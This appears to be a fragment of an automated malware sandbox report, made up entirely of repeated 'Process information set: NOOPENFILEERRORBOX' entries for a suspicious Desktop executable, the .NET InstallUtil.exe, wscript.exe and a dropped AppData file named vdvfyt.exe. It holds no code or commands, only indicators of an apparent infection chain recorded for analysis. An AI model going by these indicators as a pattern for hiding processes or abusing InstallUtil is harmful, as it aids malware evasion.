                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ref#1550238.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
